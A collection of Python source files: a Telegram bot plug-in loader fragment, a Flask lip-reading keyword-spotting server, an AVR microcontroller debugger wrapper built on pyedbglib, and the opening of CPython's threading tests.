redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
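# The loop above is a simple plug-in loader: every module listed in the
# "botfiles" Redis set and present in files/ is imported, its updateCb hook
# runs on a daemon thread, and importlib.reload picks up on-disk edits for
# the next callback. A hedged sketch of the core pattern (module name and
# hook name are illustrative):
#
#   import importlib, threading
#   mod = importlib.import_module("files.example_plugin")  # assumed module
#   threading.Thread(target=mod.updateCb,
#                    args=(client, callback_query, redis),
#                    daemon=True).start()
#   importlib.reload(mod)  # re-read the source so the next event sees new code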
|
app.py
|
import argparse
import time
import torch
import random
from tqdm import tqdm
import math
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import os
import numpy as np
import data_loader.datasets as module_data
import model.loss as module_loss
import model.metric as module_met
import model.model as module_arch
from torch.utils.data import DataLoader
from utils.util import canonical_state_dict_keys
from parse_config import ConfigParser
from model.metric import AverageMeter
from data_loader.datasets import DatasetV
from torch.utils.data.dataloader import default_collate
import sys
import json
import glob
from scipy.special import expit as sigmoid
from sklearn.metrics import average_precision_score
import pkg_resources
pkg_resources.require("matplotlib==3.2.0rc1")
import matplotlib.pyplot as plt
sys.setrecursionlimit(1500)
from flask import Flask, request, jsonify
from PIL import Image
import io
from base64 import encodebytes
import cv2
import editdistance
import tensorflow as tf
from tensorflow.keras.utils import Progbar
from datas.list_generator import ListGenerator
from language_model.char_rnn_lm import CharRnnLmWrapperSingleton
from lip_model.training_graph import TransformerTrainGraph
from lip_model.inference_graph import TransformerInferenceGraph
import shutil
import threading
import copy
import queue
app = Flask(__name__)
args = argparse.ArgumentParser()
config = ConfigParser(args)
model = config.init('arch', module_arch)
logger = config.get_logger('test')
tic = time.time()
with open(os.path.join('./misc/pretrained_models', 'KWS_Net.pth'), 'rb') as f:
checkpoint = torch.load(f)
state_dict = canonical_state_dict_keys(checkpoint['state_dict'])
model.load_state_dict(state_dict)
logger.info(f"Finished loading ckpt in {time.time() - tic:.3f}s")
logger.info(f"CUDA device count: {torch.cuda.device_count()}")
device_count = torch.cuda.device_count()
models = []
for device_ind in range(device_count):
device = f"cuda:{device_ind}"
models.append(copy.deepcopy(model).to(device))
models[device_ind].eval()
from config import load_args
configdl = load_args()
graph_dict = {
'train': TransformerTrainGraph,
'infer': TransformerInferenceGraph,
}
def init_models_and_data(istrain):
print ('Loading data generators')
val_gen, val_epoch_size = setup_generators()
os.environ["CUDA_VISIBLE_DEVICES"] = str(configdl.gpu_id)
gpu_options = tf.GPUOptions(allow_growth=True)
sess_config = tf.ConfigProto(gpu_options=gpu_options)
sess = tf.Session(config=sess_config)
if configdl.lm_path:
# initialize singleton rnn so that RNN tf graph is created first
beam_batch_size = 1
lm_handle = CharRnnLmWrapperSingleton(batch_size=beam_batch_size,
sess=sess,
checkpoint_path=configdl.lm_path)
TransformerGraphClass = graph_dict[configdl.graph_type]
(shapes_in, dtypes_in), (shapes_out, dtypes_out) = \
TransformerGraphClass.get_model_input_target_shapes_and_types()
go_idx = val_gen.label_vectorizer.char_indices[val_gen.label_vectorizer.go_token]
x_val = tf.placeholder(dtypes_in[0], shape=shapes_in[0])
prev_shape = list(shapes_out[0])
if configdl.test_aug_times : prev_shape[0] *= configdl.test_aug_times
prev_ph = tf.placeholder(dtypes_out[0], shape=prev_shape)
y_ph = tf.placeholder(dtypes_out[0], shape=shapes_out[0])
y_val = [prev_ph, y_ph]
chars = val_gen.label_vectorizer.chars
val_g = TransformerGraphClass(x_val,
y_val,
is_training=False,
reuse=tf.AUTO_REUSE,
go_token_index=go_idx,
chars=chars)
print("Validation Graph loaded")
sess.run(tf.tables_initializer())
load_checkpoints(sess)
return val_g, val_epoch_size, chars, sess, val_gen
def load_checkpoints(sess, var_scopes = ('encoder', 'decoder', 'dense')):
checkpoint_path = configdl.lip_model_path
if checkpoint_path:
if os.path.isdir(checkpoint_path):
checkpoint = tf.train.latest_checkpoint(checkpoint_path)
else:
checkpoint = checkpoint_path
if configdl.featurizer:
if checkpoint_path:
from tensorflow.contrib.framework.python.framework import checkpoint_utils
var_list = checkpoint_utils.list_variables(checkpoint)
for var in var_list:
if 'visual_frontend' in var[0]:
var_scopes = var_scopes + ('visual_frontend',)
break
if not 'visual_frontend' in var_scopes:
featurizer_vars = tf.global_variables(scope='visual_frontend')
featurizer_ckpt = tf.train.get_checkpoint_state(configdl.featurizer_model_path)
featurizer_vars = [var for var in featurizer_vars if not 'Adam' in var.name]
tf.train.Saver(featurizer_vars).restore(sess, featurizer_ckpt.model_checkpoint_path)
all_variables = []
for scope in var_scopes:
all_variables += [var for var in tf.global_variables(scope=scope)
if not 'Adam' in var.name ]
if checkpoint_path:
tf.train.Saver(all_variables).restore(sess, checkpoint)
print("Restored saved model {}!".format(checkpoint))
def setup_generators(verbose=False):
val_gen = ListGenerator(data_list=configdl.data_list)
val_epoch_size = val_gen.calc_nbatches_per_epoch()
return val_gen, val_epoch_size
tic = time.time()
np.random.seed(configdl.seed)
tf.set_random_seed(configdl.seed)
val_g, val_epoch_size, chars, sess, val_gen = init_models_and_data(istrain=0)
logger.info(f"Finished initializing Deep Lip Reading model in {time.time() - tic:.3f}s")
# https://pytorch.org/tutorials/intermediate/flask_rest_api_tutorial.html
@app.route('/predict', methods=['GET', 'POST'])
def predict():
print("Lipspeak: Posted file: {}".format(request.files['file']))
tic = time.time()
file = request.files['file']
file.save('media/lipspeak/raw_videos/demo.mp4')
#print("Lipspeak: File saved at: 'media/lipspeak/raw_videos/demo.mp4'")
logger.info(f"Finished saving raw video in {time.time() - tic:.3f}s")
#https://stackoverflow.com/questions/47679227/using-python-to-send-json-and-files-to-flask
tic = time.time()
print("Processing Phrasebook")
queries = json.loads(request.form['phrasebook'])
with open('data/vocab/lipspeak/testphrases.json') as json_file:
phrases = json.load(json_file)
testdict = {}
for key, value in queries.items():
for x in value:
x = x.strip()
testdict[x] = phrases[x]
with open('data/vocab/lipspeak/test_phrases.json', 'w') as fp:
json.dump(testdict, fp)
CMUwords1, phonemes1 = get_CMU_words("data/vocab/cmudict.dict")
with open('data/vocab/lipspeak/test_phrases.json') as f:
test_cases = json.load(f)
dict_lines = []
for full_phrase in test_cases:
for phrase_type in test_cases[full_phrase]:
for test_phrase in test_cases[full_phrase][phrase_type]:
test_phonemes = []
for word in test_phrase.split(" "):
test_phonemes.append(" ".join(phonemes1[CMUwords1.index(word)]).replace("\n",""))
dict_lines.append(test_phrase.replace("_", "") + " " + " ".join(test_phonemes) + "\n")
with open("data/vocab/lipspeak/testdict.dict", "w") as f:
f.writelines(dict_lines)
logger.info(f"Finished processing phrasebook in {time.time() - tic:.3f}s")
tic = time.time()
print("Lipspeak: Resizing video")
video_alignment_resizing()
logger.info(f"Finished resizing video in {time.time() - tic:.3f}s")
tic = time.time()
print("Lipspeak: setup generator for deep lip read")
val_gen, val_epoch_size = setup_generators()
logger.info(f"Finished setup generator in {time.time() - tic:.3f}s")
print("Lipspeak: Extracting features")
tic = time.time()
evaluate_model(val_g, val_epoch_size, chars, sess, val_gen)
logger.info(f"Finished extracting features in {time.time() - tic:.3f}s")
print("Lipspeak: Predict using KWS")
tic = time.time()
kws_prediction = evaluation(config)
logger.info(f"Finished evaluating KWS model in {time.time() - tic:.3f}s")
return jsonify({'index': int(kws_prediction)})
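# A hedged client-side sketch of calling this route (URL, filename and
# phrasebook keys are assumptions for illustration):
#
#   import json, requests
#   with open("demo.mp4", "rb") as f:
#       resp = requests.post("http://localhost:5000/predict",
#                            files={"file": f},
#                            data={"phrasebook": json.dumps({"greetings": ["hello there"]})})
#   print(resp.json())  # e.g. {"index": 3}; -1 means no phrase was detected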
def collate_fn(batch):
# Return the raw list of samples; batching into padded tensors is done
# manually in transform_batch_test, so default_collate is bypassed on purpose.
return batch
def transform_batch_test(lstV_widx_sent, batchword, config):
target = []
lens = []
vnames = []
vidx = []
view = []
batch_size = len(lstV_widx_sent)
start_times = []
end_times = []
lstV_widx_sent_real = []
for k in range(0,batch_size):
if lstV_widx_sent[k][0].size(0)>1:
lstV_widx_sent_real.append(lstV_widx_sent[k])
batch_size = len(lstV_widx_sent_real)
for k in range(0,batch_size):
lens.append(lstV_widx_sent_real[k][0].size(0))
TN = 1 if any(x == batchword for x in lstV_widx_sent_real[k][1]) else 0
target.append(TN)
if TN == 0:
start_times.append(0)
end_times.append(0)
else:
for i, x in enumerate(lstV_widx_sent_real[k][1]):
if x ==batchword:
start_times.append(lstV_widx_sent_real[k][4][i])
end_times.append(lstV_widx_sent_real[k][5][i])
vnames.append(lstV_widx_sent_real[k][2])
view.append(lstV_widx_sent_real[k][3])
lens = np.asarray(lens)
target = np.asarray(target)
start_times = np.asarray(start_times)
end_times=np.asarray(end_times)
Ilens = np.argsort(-lens)
lens = lens[Ilens]
target = target[Ilens]
start_times = start_times[Ilens]
end_times = end_times[Ilens]
vnames = [vnames[i] for i in Ilens]
view = [view[i] for i in Ilens]
max_len = lens[0]
max_out_len,rec_field, offset = in2out_idx(max_len)
batchV = np.zeros((batch_size,max_len,lstV_widx_sent_real[0][0].size(1))).astype('float')
for i in range(0, batch_size):
batchV[i,:lens[i],:] = lstV_widx_sent_real[Ilens[i]][0].clone()
return batchV, lens, target, vnames, view, start_times, end_times, rec_field, Ilens
def in2out_idx(idx_in):
layers = [
{ 'type': 'conv3d', 'n_channels': 32, 'kernel_size': (1,5,5), 'stride': (1,2,2), 'padding': (0,2,2) ,
'maxpool': {'kernel_size' : (1,2,2), 'stride': (1,2,2)} },
{ 'type': 'conv3d', 'n_channels': 64, 'kernel_size': (1,5,5), 'stride': (1,2,2), 'padding': (0,2,2),
'maxpool': {'kernel_size' : (1,2,2), 'stride': (1,2,2)}
},
]
layer_names = None
from misc.compute_receptive_field import calc_receptive_field
idx_out, _, rec_field, offset = calc_receptive_field(layers, idx_in, layer_names)
return idx_out, rec_field, offset
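# For reference, receptive-field sizes for a conv/pool stack like the one
# above follow the standard recurrence (a sketch of the idea, not the exact
# implementation in misc.compute_receptive_field): with jump j (input stride
# between neighbouring outputs) and receptive field r, per dimension,
#
#   r_out = r_in + (kernel_size - 1) * j_in
#   j_out = j_in * stride
#
# applied layer by layer, starting from r = j = 1 at the input.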
def evaluation(config, logger=None):
def infer_batch(batch_output, widx_list, config, device_ind, queue, model):
logger.info(f"CUDA device context {device_ind}")
with torch.cuda.device(device_ind):
input, lens, target, vnames, view, start_times, end_times, rec_field, Ilens = batch_output
batch_size = input.shape[0]
target = torch.from_numpy(target).cuda(non_blocking=True)
input = torch.from_numpy(input).float().cuda(non_blocking=True)
input_var = Variable(input)
target_var = Variable(target.view(-1,1)).float()
grapheme = []
phoneme = []
for w in widx_list:
grapheme.append(test_dataset.get_GP(w)[0])
phoneme.append(test_dataset.get_GP(w)[1])
batchword_str = ''.join(grapheme[0])
graphemeTensor = Variable(test_dataset.grapheme2tensor(grapheme)).cuda()
phonemeTensor = Variable(test_dataset.phoneme2tensor(phoneme)).cuda()
for w in range(len(widx_list)):
for k in range(0,len(target)):
logits = []
padding = math.ceil((rec_field-1)/2)
input_loc = input[k,:,:].unsqueeze(0).cpu().detach().numpy()
input_loc = np.pad(input_loc, ((0,0), (padding,padding), (0,0)), 'constant', constant_values=(0, 0))
for m in range(0,lens[k]):
input_chunck = torch.from_numpy(input_loc).float().cuda(non_blocking=True)[:, m:m+23, :]  # 23-frame window starting at m (matches lens_loc below)
input_var_chunck= Variable(input_chunck)
lens_loc = np.asarray([23])
preds_loc = model(vis_feat_lens=lens_loc,p_lengths=None, phonemes=phonemeTensor[:,w].unsqueeze(1).detach(), graphemes=graphemeTensor[:-1][:,w].unsqueeze(1).detach(), vis_feats=input_var_chunck, use_BE_localiser=use_BE_localiser, epoch=74, config=config)
logits.append(preds_loc["o_logits"][0][1][0].item())
logits = sigmoid(np.array(logits))
queue.put((widx_list[w], logits))
if logger is None:
logger = config.get_logger('test')
device_count = torch.cuda.device_count()
queues = []
for device_ind in range(device_count):
queues.append(queue.Queue())
num_words = config["dataset"]["args"]["num_words"] #135091
num_phoneme_thr = config["dataset"]["args"]["num_phoneme_thr"]
split = config["dataset"]["args"]["split"]
cmu_dict_path = config["dataset"]["args"]["cmu_dict_path"]
data_struct_path = config["dataset"]["args"]["data_struct_path"]
p_field_path = config["dataset"]["args"]["field_vocab_paths"]["phonemes"]
g_field_path = config["dataset"]["args"]["field_vocab_paths"]["graphemes"]
vis_feat_dir = config["dataset"]["args"]["vis_feat_dir"]
batch_size = config["data_loader"]["args"]["batch_size"]
shuffle = config["data_loader"]["args"]["shuffle"]
drop_last = config["data_loader"]["args"]["drop_last"]
pin_memory = config["data_loader"]["args"]["pin_memory"]
num_workers = config["data_loader"]["args"]["num_workers"]
g2p = config["arch"]["args"]["g2p"]
use_BE_localiser = config["arch"]["args"]["rnn2"]
#tic = time.time()
test_dataset = DatasetV(num_words, num_phoneme_thr, cmu_dict_path, vis_feat_dir,split, data_struct_path, p_field_path, g_field_path, False)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, num_workers =
num_workers, pin_memory=pin_memory, shuffle=shuffle, drop_last=drop_last, collate_fn = collate_fn )
#logger.info(f"Finished dataset loading in {time.time() - tic:.3f}s")
#tic = time.time()
Words = []
for i, lstVwidx in enumerate(test_loader):
for b in range(0, len(lstVwidx)):
for w in lstVwidx[b][1]:
if w != -1:
Words.append(w)
Words = np.unique(np.asarray(Words).astype('int32')).tolist()
#end = time.time()
labels = []
scores = []
original_labels = []
names = []
query_words,_ = get_CMU_words(cmu_dict_path)
results = [None] * len(Words)
logger.info(f"Start Inference:")
#tic = time.time()
batchword = 0
for i, lstVwidx in enumerate(test_loader):
batch_output = transform_batch_test(lstVwidx, batchword, config)
word_intervals = [len(Words)//device_count] * device_count
remainder = len(Words) % device_count
for i in range(remainder):
word_intervals[i] += 1
start_pos = 0
for i in range(len(word_intervals)):
end_pos = start_pos + word_intervals[i]
word_intervals[i] = (start_pos, end_pos)
start_pos = end_pos
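# Worked example of the partitioning above: with len(Words) == 10 and
# device_count == 3, word_intervals starts as [3, 3, 3], the remainder 1
# bumps it to [4, 3, 3], and the running start_pos turns it into the
# half-open ranges [(0, 4), (4, 7), (7, 10)] - one slice of Words per GPU.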
print(word_intervals)
threads = []
for i in range(len(word_intervals)):
threads.append(threading.Thread(target=infer_batch, args=(batch_output, Words[word_intervals[i][0]:word_intervals[i][1]], config, i%device_count, queues[i%device_count], models[i%device_count],)))
for i in range(len(word_intervals)):
threads[i].start()
for i in range(len(word_intervals)):
threads[i].join()
for i in range(len(word_intervals)):
while not queues[i].empty():
j, logits = queues[i].get()
results[j] = logits
#logger.info(f"Finished Inference: time spent {round(time.time()-tic,3)}")
#####EH inference_code_block#####
prob_threshold = 0.3
results = np.stack(results, axis=0)
probs = np.sum((results-prob_threshold).clip(0,1), axis = 1)
if np.sum(probs) == 0:
pred = -1
else:
pred = np.argmax(probs)
print(f"Prediction is {pred}, which is {'unknown' if pred == -1 else query_words[pred]}")
#logger.info(f"Finished KWS in {time.time() - tic:.3f}s")
return pred
#####EH inference_code_block#####
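# Worked example of the scoring above: with prob_threshold == 0.3, a word
# whose per-frame sigmoid scores are [0.2, 0.5, 0.9] contributes
# (0.5 - 0.3) + (0.9 - 0.3) = 0.8 after the clip, while a word that never
# crosses 0.3 contributes 0. The argmax over these sums picks the keyword;
# if every sum is 0 the function returns -1 ("unknown").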
def video_alignment_resizing():
output_video_dir = "media/lipspeak"
raw_video_dir = os.path.join(output_video_dir, "raw_videos")
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
for video_name in os.listdir(raw_video_dir):
if video_name[-4:].lower() not in [".mp4", ".mov"]: continue
input_video_path = os.path.join(raw_video_dir, video_name)
video_stream = cv2.VideoCapture(input_video_path)
output_video_path = os.path.join(output_video_dir, video_name[:video_name.find(".")]+".mp4")
out = cv2.VideoWriter(output_video_path, fourcc, 30.0, (160,160))
while 1:
still_reading, frame = video_stream.read()
if not still_reading:
# frame is None once the stream is exhausted, so stop before writing;
# only the cropped, resized frames below go to the 160x160 writer
video_stream.release()
break
try:
processed_frame = frame[210:572, 55:417]
processed_frame = cv2.resize(processed_frame, (160, 160))
out.write(processed_frame)
except Exception as e:
print("DEBUG: resize error", str(e))
print(f"Saved file at: {output_video_path}")
out.release()
cv2.destroyAllWindows()
def evaluate_model(val_g, val_epoch_size, chars, sess, val_gen):
np.random.seed(configdl.seed)
tf.set_random_seed(configdl.seed)
tb_writer = None
if configdl.tb_eval:
import shutil
try: shutil.rmtree('eval_tb_logs')
except: pass
tb_logdir = os.path.join(os.getcwd(), 'eval_tb_logs' , 'val')
tb_writer = tf.summary.FileWriter(tb_logdir, sess.graph)
with sess.as_default():
for _ in range(configdl.n_eval_times):
validation_loop(sess, val_g,
val_epoch_size,
chars = chars,
val_gen = val_gen,
tb_writer = tb_writer,
)
print("Done")
def validation_loop(sess, g, n_batches, chars=None, val_gen = None, tb_writer=None):
Loss = []
Cer = []
Wer = []
progbar = Progbar(target=n_batches, verbose=1, stateful_metrics=['t'])
print ('Starting validation Loop')
feature_dir = configdl.feat_output_dir
v_names = write_query_file(feature_dir)
feature_dir = os.path.join(feature_dir, "features")
os.makedirs(feature_dir, exist_ok = False)
video_frame_count = {}
for i in range(n_batches):
x, y = val_gen.next()
if len(x) == 1: x = x[0]
if len(y) == 1: y = y[0]
# -- Autoregressive inference
preds = np.zeros((configdl.batch_size, configdl.maxlen), np.int32)
tile_preds = configdl.test_aug_times
# -- For train graph feed in the previous step's predictions manually for the next
if not 'infer' in configdl.graph_type:
prev_inp = np.tile(preds, [configdl.test_aug_times,1]) if tile_preds else preds
feed_dict = {g.x: x, g.prev: prev_inp, g.y: y}
#####EH Add code block for testing and multiple videos and saving results#####
features_to_extract = sess.run( g.feats, feed_dict)
features_to_extract = features_to_extract[0, :, :]
file_path = os.path.join(feature_dir, f"{v_names[i]}.npy")
with open(file_path, 'wb') as f:
np.save(f, features_to_extract)
print("feature output file created at", file_path)
#####EH End of the added code block Erik Hou#####
###EH End of code added by Erik to extract video length###
def get_CMU_words(CMU_path):
words = []
phonemes = []
with open(CMU_path) as f:
lines = f.readlines()
for wcnt, line in enumerate(lines):
grapheme, phoneme = line.split(" ",1)
words.append(grapheme)
phonemes.append(phoneme.split(" "))
return words, phonemes
def get_video_names(data_struct_path, split):
with open(data_struct_path) as f:
test_cases = json.load(f)[split]
return [test_case["fn"] for test_case in test_cases]
def write_query_file(feature_dir):
if os.path.isdir(feature_dir):
shutil.rmtree(feature_dir, ignore_errors = False)
os.makedirs(feature_dir, exist_ok = True)
CMUwords,_ = get_CMU_words(configdl.dict_file)
if configdl.query_type == "word":
with open(configdl.data_list) as f:
lines = f.readlines()
v_names = []
Dsplitsdemo = {"test":[]}
for line in lines:
v_name, text = line.split(",", 1)
v_names.append(v_name)
test_words = text.strip().replace(",", "").replace("\n", "").lower().split(" ")
test_word_indices = []
print(text, test_words)
for test_word in test_words:
try:
test_word_ind = CMUwords.index(test_word)
except ValueError:
test_word_ind = -1
test_word_indices.append(test_word_ind)
test_words_len = len(test_word_indices)
Dsplitsdemo["test"].append({
"end_word": [0] * test_words_len,
"start_word": [0] * test_words_len,
"widx": test_word_indices,
"fn": v_name[:-4]})
elif configdl.query_type == "phrase":
with open(configdl.data_list) as f:
lines = f.readlines()
v_names = []
Dsplitsdemo = {"phrase":[]}
for line in lines:
v_name, text = line.split(",", 1)
v_names.append(v_name)
Dsplitsdemo["phrase"].append({
"end_word": [0] * len(CMUwords),
"start_word": [0] * len(CMUwords),
"widx": [i for i in range(len(CMUwords))],
"fn": v_names[0][:-4]})
for i in range(1, len(v_names)):
Dsplitsdemo["phrase"].append({
"end_word": [],
"start_word": [],
"widx": [],
"fn": v_names[i][:-4]})
else:
print("Error!!!!!, wrong query type")
return
file_path = os.path.join(feature_dir, "Dsplitsdemo.json")
with open(file_path, 'w') as f:
f.write(json.dumps(Dsplitsdemo))
return v_names
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
debugger.py
|
from pyedbglib.hidtransport.hidtransportfactory import hid_transport
from pyedbglib.protocols import housekeepingprotocol
from pyedbglib.protocols import avr8protocol
from pyedbglib.protocols import avr8protocolerrors
# Retrieve device info
from pymcuprog.deviceinfo import deviceinfo
# Construct an NVM provider
from pymcuprog.nvmupdi import NvmAccessProviderCmsisDapUpdi
from pyedbglib.protocols.avrcmsisdap import AvrCommand, AvrCommandError
from pyedbglib.protocols.jtagice3protocol import Jtagice3Command
import logging
import threading
import time
import asyncio
logging.basicConfig(level=logging.INFO,handlers=[logging.StreamHandler()])
class Debugger():
def __init__(self, DeviceName):
# Make a connection
self.transport = hid_transport()
self.transport.disconnect()
# Connect
self.transport.connect()
self.deviceInf = deviceinfo.getdeviceinfo(DeviceName)
self.memoryinfo = deviceinfo.DeviceMemoryInfo(self.deviceInf)
self.housekeeper = housekeepingprotocol.Jtagice3HousekeepingProtocol(self.transport)
self.housekeeper.start_session()
self.device = NvmAccessProviderCmsisDapUpdi(self.transport, self.deviceInf)
#self.device.avr.deactivate_physical()
self.device.avr.activate_physical()
# Start debug by attaching (live)
self.device.avr.protocol.attach()
#threading.Thread(target=pollingThread, args=(self.eventReciver,)).start()
def pollEvent(self):
#eventRegister = self.eventReciver.poll_events()
eventRegister = self.device.avr.protocol.poll_events()
#logging.info(eventRegister)
if eventRegister[0] == AvrCommand.AVR_EVENT: # Verifying data is an event
size = int.from_bytes(eventRegister[1:3], byteorder='big')
if size != 0:
# event received
logging.info("Event received")
eventarray = eventRegister[3:(size+1+3)]
SOF = eventarray[0]
protocol_version = eventarray[1:2]
sequence_id = eventarray[2:4]
protocol_handler_id = eventarray[4:5]
payload = eventarray[5:]
#logging.info(eventarray)
if payload[0] == avr8protocol.Avr8Protocol.EVT_AVR8_BREAK:
event_id = payload[0]
#event_version = payload[1]
pc = payload[1:5]
break_cause = payload[5]
extended_info = payload[6:]
print("PC: ", end="")
print(int.from_bytes(pc, byteorder='little'))
logging.info("Recived break event")
return (avr8protocol.Avr8Protocol.EVT_AVR8_BREAK, int.from_bytes(pc, byteorder='little'), break_cause)
else:
logging.info("Unknown event: " + payload[0])
return None
else:
logging.info("No event")
return None
# Memory interaction
def writeSRAM(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('internal_sram'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('internal_sram'), address-offset, data)
def readSRAM(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('internal_sram'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('internal_sram'), address-offset, numBytes)
def readFlash(self, address, numBytes):
return self.device.read(self.memoryinfo.memory_info_by_name('flash'), address, numBytes)
def writeEEPROM(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('eeprom'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('eeprom'), address-offset, data)
def readEEPROM(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('eeprom'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('eeprom'), address-offset, numBytes)
def writeFuse(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('fuses'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('fuses'), address-offset, data)
def readFuse(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('fuses'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('fuses'), address-offset, numBytes)
def writeLock(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('lockbits'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('lockbits'), address-offset, data)
def readLock(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('lockbits'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('lockbits'), address-offset, numBytes)
def writeSignature(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('signatures'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('signatures'), address-offset, data)
def readSignature(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('signatures'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('signatures'), address-offset, numBytes)
def writeUserSignature(self, address, data):
offset = (self.memoryinfo.memory_info_by_name('user_row'))['address']
return self.device.write(self.memoryinfo.memory_info_by_name('user_row'), address-offset, data)
def readUserSignature(self, address, numBytes):
offset = (self.memoryinfo.memory_info_by_name('user_row'))['address']
return self.device.read(self.memoryinfo.memory_info_by_name('user_row'), address-offset, numBytes)
# General debugging
def attach(self, do_break=False):
self.device.avr.protocol.attach(do_break)
def detach(self):
self.device.avr.protocol.detach()
# Flow control
def reset(self):
self.device.avr.protocol.reset()
def step(self):
self.device.avr.protocol.step()
def stop(self):
self.device.avr.protocol.stop()
def run(self):
self.device.avr.protocol.run()
def runTo(self, address):
wordAddress = int(address/2)
self.device.avr.protocol.run_to(wordAddress)
def readStackPointer(self):
return self.device.avr.stack_pointer_read()
def readSREG(self):
return self.device.avr.protocol.memory_read(avr8protocol.Avr8Protocol.AVR8_MEMTYPE_OCD, 0x1C, 0x01)
def readRunningState(self):
# Debug interface to see what state the avr is in.
AVR8_CTXT_TEST = 0x80
AVR8_TEST_TGT_RUNNING = 0x00
running = bool(self.device.avr.protocol.get_byte(AVR8_CTXT_TEST, AVR8_TEST_TGT_RUNNING))
logging.info("AVR running state " + str(running))
return running
# Register and programcounter
def readRegs(self):
return self.device.avr.protocol.regfile_read()
def writeRegs(self, regs):
return self.device.avr.protocol.regfile_write(regs)
def readProgramCounter(self):
# Returned as a word not a byte
return self.device.avr.protocol.program_counter_read()
def writeProgramCounter(self, programCounter):
self.device.avr.protocol.program_counter_write(programCounter)
# SoftwareBreakpoints EDBG expects these addresses in bytes
# Multiple SW breakpoints can be defined by shifting 4 bytes to the left
def breakpointSWSet(self, address):
self.device.avr.protocol.software_breakpoint_set(address)
def breakpointSWClear(self, address):
self.device.avr.protocol.software_breakpoint_clear(address)
def breakpointSWClearAll(self):
self.device.avr.protocol.software_breakpoint_clear_all()
# HardwareBreakpoints EDBG expects these addresses in words
def breakpointHWSet(self, address):
wordAddress = int(address/2)
self.device.avr.breakpoint_set(wordAddress)
def breakpointHWClear(self):
self.device.avr.breakpoint_clear()
# Cleanup code for detaching the target
def cleanup(self):
# and end debug
self.device.avr.protocol.stop()
self.device.avr.protocol.software_breakpoint_clear_all()
self.device.avr.breakpoint_clear()
self.device.avr.protocol.detach()
# Stop session
#avr.stop()
self.device.avr.deactivate_physical()
# Unwind the stack
self.housekeeper.end_session()
self.transport.disconnect()
def __exit__(self, exc_type, exc_value, traceback):
self.cleanup()
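# A hedged usage sketch (device name and addresses are illustrative; running
# it requires a real EDBG/UPDI debug kit attached over USB):
#
#   dbg = Debugger("attiny817")          # assumed device name
#   dbg.attach(do_break=True)            # halt the target
#   dbg.breakpointHWSet(0x0100)          # byte address; converted to words internally
#   dbg.run()
#   while dbg.pollEvent() is None:       # spin until the break event arrives
#       pass
#   print(dbg.readProgramCounter())      # word address at the halt
#   dbg.cleanup()                        # detach and release the transport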
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
